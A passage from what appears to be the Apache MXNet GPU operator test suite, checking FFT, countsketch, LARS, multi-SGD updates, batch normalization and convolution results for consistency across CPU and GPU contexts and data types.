for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
@with_seed()
@pytest.mark.serial
def test_countsketch():
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1, maxn)
check_countsketch(in_dim, out_dim, n)
def check_ifft(shape):
shape_old = shape
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1]*2)
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1],shape[2],shape[3]*2)
sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128)
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
if len(shape) == 2:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[1]):
init_complex.real[:,i] = init[0][:,2*i]
init_complex.imag[:,i] = init[0][:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[3]):
init_complex.real[:,:,:,i] = init[0][:,:,:,2*i]
init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[1]):
temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[3]):
temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
@with_seed()
def test_ifft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_ifft(shape)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0], rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[3],rtol=1e-3, atol=1e-5)
@with_seed()
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
def _make_ndarrays(input_list, ctx=mx.gpu(0)):
return [mx.nd.array(arr, dtype=arr.dtype, ctx=ctx) for arr in input_list]
def check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2):
values_arr = [np.random.rand(*shape).astype(dtype) * 10. for shape in shapes]
mx_vals = _make_ndarrays(values_arr, ctx=ctx)
sum_sq = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
sum_sq2 = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
# checks that operator is deterministic
assert np.array_equal(sum_sq.asnumpy(), sum_sq2.asnumpy())
ref_sum_sq = mx.nd.array([(v.astype('float32') ** 2).sum() for v in values_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_sum_sq.asnumpy(), sum_sq.asnumpy(), atol=tol1, rtol=tol1)
@with_seed()
@pytest.mark.serial
def test_multi_sum_sq():
min_nparam = 100
max_nparam = 120
min_dim = 50000
max_dim = 100000
max_ndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.gpu(0)]:
for dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(min_dim, max_dim + 1, size=max_ndim) for i in range(nparam)]
low_tol = ctx == mx.cpu(0) and ('float16'in [dtype])
tol1 = 1e-3 if low_tol else 1e-5
tol2 = 1e-6 if low_tol else 1e-7
check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2)
def check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2):
weights_arr = [np.random.rand(*shape).astype(w_dtype) * 10. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(g_dtype) for shape in shapes]
lrs = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 100.
wds = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 1000.
eta = (np.random.rand() + 0.1)
eps = (np.random.rand() + 0.1) / 10000.
mx_w = _make_ndarrays(weights_arr, ctx=ctx)
mx_g = _make_ndarrays(grads_arr, ctx=ctx)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=ctx)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=ctx)
w_sum_sq = mx.nd.multi_sum_sq(*mx_w, num_arrays=len(shapes))
g_sum_sq = mx.nd.multi_sum_sq(*mx_g, num_arrays=len(shapes))
ref_w_sum_sq = mx.nd.array([(w.astype('float32') ** 2).sum() for w in weights_arr],
dtype='float32', ctx=ctx)
ref_g_sum_sq = mx.nd.array([(g.astype('float32') ** 2).sum() for g in grads_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_w_sum_sq.asnumpy(), w_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
assert_almost_equal(ref_g_sum_sq.asnumpy(), g_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
rescale_grad = (np.random.rand() + 0.5) * 100.
mx_new_lrs = mx.nd.multi_lars(mx_lrs, w_sum_sq, g_sum_sq, mx_wds, eta=eta, eps=eps,
rescale_grad=rescale_grad)
ref_w_l2norm = mx.nd.sqrt(ref_w_sum_sq)
ref_g_l2norm = mx.nd.sqrt(ref_g_sum_sq * rescale_grad * rescale_grad)
ref_new_lrs = mx.nd.zeros(ref_w_l2norm.shape, dtype='float32', ctx=ctx)
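# Reference LARS scaling computed below: lr_i' = lr_i * eta * ||w_i|| / (||g_i|| + wd_i * ||w_i|| + eps)
# whenever both norms are positive; otherwise the layer keeps its base learning rate.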
for i in range(ref_w_l2norm.size):
_w = ref_w_l2norm[i]
_g = ref_g_l2norm[i]
if _w > 0.0 and _g > 0.0:
ref_new_lrs[i] = lrs[i] * eta * _w / (_g + wds[i] * _w + eps)
else:
ref_new_lrs[i] = lrs[i]
assert_almost_equal(ref_new_lrs.asnumpy(), mx_new_lrs.asnumpy(), atol=tol2, rtol=tol2)
@with_seed()
@pytest.mark.serial
def test_fast_lars():
min_nparam = 50
max_nparam = 60
maxdim = 10000
maxndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.cpu(0), mx.gpu(0)]:
for w_dtype in dtypes:
for g_dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
lowTol = ctx == mx.cpu(0) and ('float16'in [w_dtype, g_dtype])
tol1 = 1e-3 if lowTol else 1e-5
tol2 = 1e-6 if lowTol else 1e-7
check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2)
def check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights):
def _flatten_list(nested_list):
return [item for sublist in nested_list for item in sublist]
weights_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
rescale_grad = (np.random.random() + 1.0)
mx_w = _make_ndarrays(weights_arr)
mx_g = _make_ndarrays(grads_arr)
mx_p_w = _make_ndarrays(weights_arr)
mx_p_g = _make_ndarrays(grads_arr)
lrs = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 100.)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=mx.gpu(0))
wds = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 1000.)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=mx.gpu(0))
if use_master_weights:
weights32_arr = [arr.astype('float32') for arr in weights_arr]
mx_w32 = _make_ndarrays(weights32_arr)
mx_p_w32 = _make_ndarrays(weights32_arr)
if momentum is None:
if use_master_weights:
mx.nd.multi_mp_sgd_update(
*_flatten_list(zip(mx_w, mx_g, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
mx.nd.preloaded_multi_mp_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
out = mx.nd.multi_sgd_update(
*_flatten_list(zip(mx_w, mx_g)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
if use_master_weights:
momentums_arr = [np.random.rand(*shape).astype("float32") for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
out = mx.nd.multi_mp_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_mp_sgd_mom_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
else:
momentums_arr = [np.random.rand(*shape).astype(dtype) for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
mx.nd.multi_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
mx.nd.preloaded_multi_sgd_mom_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
def _assert_all_almost_equal(lhs_list, rhs_list, rtol, atol):
for i, (lhs, rhs) in enumerate(zip(lhs_list, rhs_list)):
assert_almost_equal(lhs.asnumpy(), rhs.asnumpy(), rtol=rtol, atol=atol)
if dtype == 'float16':
rtol = 1e-3
atol = 1e-2
else:
rtol = 1e-5
atol = 1e-6
_assert_all_almost_equal(mx_p_w, mx_w, rtol, atol)
if momentum is not None:
_assert_all_almost_equal(mx_p_m, mx_m, rtol, atol)
if use_master_weights:
_assert_all_almost_equal(mx_p_w32, mx_w32, 1e-5, 1e-6)
@with_seed()
def test_preloaded_multi_sgd():
dtypes = ['float16', 'float32']
momentums = [None, 0.9]
min_nparam = 5
max_nparam = 10
maxdim = 6
maxndim = 4
for dtype in dtypes:
use_master_weights_list = [False,] if dtype == 'float32' else [True, False]
for use_master_weights in use_master_weights_list:
for momentum in momentums:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights)
@with_seed()
@pytest.mark.serial
def test_batchnorm_with_type():
ctx_list_v1_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
]
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}}
]
# V1, 2D
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
check_consistency(sym, ctx_list_v1_2D)
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
check_consistency(sym, ctx_list_v1_2D)
# V2, 2D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
#
# # V2, 3D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
@pytest.mark.serial
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNormV1 cpu
if 'batchnorm_v1_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNormV1 gpu (organic)
if 'batchnorm_v1_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
'batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5)
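# A tiny standalone sketch (new helper, not invoked by the test run) of the pairing that
# check_consistency_NxM builds: each symbol is repeated len(ctx_list) times while the context
# list is tiled len(sym_list) times, so every one of the N x M combinations is compared.
def _illustrate_nxm_pairing():
    import numpy as np
    syms = ['sym1', 'sym2']
    ctxs = ['ctx1', 'ctx2', 'ctx3']
    paired_syms = list(np.repeat(syms, len(ctxs)))
    paired_ctxs = ctxs * len(syms)
    assert paired_syms == ['sym1', 'sym1', 'sym1', 'sym2', 'sym2', 'sym2']
    assert paired_ctxs == ['ctx1', 'ctx2', 'ctx3', 'ctx1', 'ctx2', 'ctx3']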
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141")
@with_seed()
@pytest.mark.serial
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
